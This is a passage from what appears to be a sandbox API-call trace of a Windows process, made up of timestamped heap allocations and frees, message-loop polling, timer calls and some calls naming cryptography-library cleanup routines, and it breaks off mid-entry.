[0215.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0215.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0215.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0215.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0215.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0215.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0215.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0215.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0215.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0215.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0215.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0215.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0215.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0215.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0215.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0215.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0215.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0215.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0215.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0215.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0215.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0215.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0215.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0215.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0215.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0215.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0215.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0215.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0215.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0215.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0215.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0215.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0215.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0215.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0215.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0215.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0215.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0215.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0215.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0215.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0215.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0215.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0215.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0215.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0215.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0215.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0215.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0215.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0215.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0215.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0215.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0215.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0215.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0215.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0215.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0215.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0215.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0215.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0215.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0215.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0215.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0215.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0215.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0215.481] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0215.481] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0215.481] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0215.481] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0215.481] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.481] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0215.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0215.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0215.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0215.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0215.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0215.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0215.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0215.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0215.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0215.482] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0215.482] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0215.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0215.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0215.482] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0215.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0215.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0215.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0215.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0215.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0215.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0215.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0215.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0215.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0215.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0215.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0215.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0215.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xcde0) returned 0x2e8d118 [0215.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0215.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0215.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0215.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0215.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0215.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0215.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0215.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0215.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0215.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0215.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0215.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xcde0) returned 0x2e99f00 [0215.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e8d118 | out: hHeap=0x970000) returned 1 [0215.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.486] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0215.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0215.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0215.486] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0215.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0215.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0215.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0215.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0215.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0215.486] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0215.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0215.486] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0215.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0215.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0215.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0215.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0215.486] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0215.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0215.486] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0215.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0215.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0215.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0215.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0215.487] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0215.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0215.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0215.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0215.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0215.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0215.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0215.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0215.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0215.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0215.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0215.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0215.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0215.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0215.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0215.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0215.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0215.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0215.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0215.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0215.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0215.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0215.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0215.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0215.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0215.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0215.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0215.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0215.488] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0215.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0215.488] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0215.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0215.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0215.488] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0215.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0215.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0215.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0215.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0215.488] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0215.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0215.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0215.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0215.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0215.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0215.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0215.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0215.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0215.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0215.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0215.488] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0215.489] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0215.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0215.489] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0215.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0215.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0215.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0215.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0215.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0215.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0215.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0215.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0215.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0215.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0215.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xcde0) returned 0x2e8d118 [0215.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0215.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0215.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xcde0) returned 0x2ea6ce8 [0215.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0215.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0215.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e8d118 | out: hHeap=0x970000) returned 1 [0215.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0215.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0215.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0215.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xcde0) returned 0x2e8d118 [0215.490] HeapFree (in: hHeap=0x970000, 